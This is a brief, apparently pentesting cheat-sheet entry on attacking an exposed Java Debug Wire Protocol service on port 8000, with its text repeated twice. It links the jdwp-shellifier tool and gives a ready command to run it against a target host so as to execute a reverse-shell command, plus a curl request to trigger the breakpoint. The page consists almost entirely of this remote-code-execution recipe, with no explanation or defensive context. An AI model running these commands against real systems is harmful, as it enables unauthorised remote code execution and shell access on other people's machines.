JDWP - 8000
Link: https://github.com/hugsy/jdwp-shellifier
python3 jdwp-shellifier.py -t 192.168.1.3 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'reverse shell'&
curl http://192.168.1.3
Last updated
Was this helpful?
Link: https://github.com/hugsy/jdwp-shellifier
python3 jdwp-shellifier.py -t 192.168.1.3 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'reverse shell'&
curl http://192.168.1.3
Last updated
Was this helpful?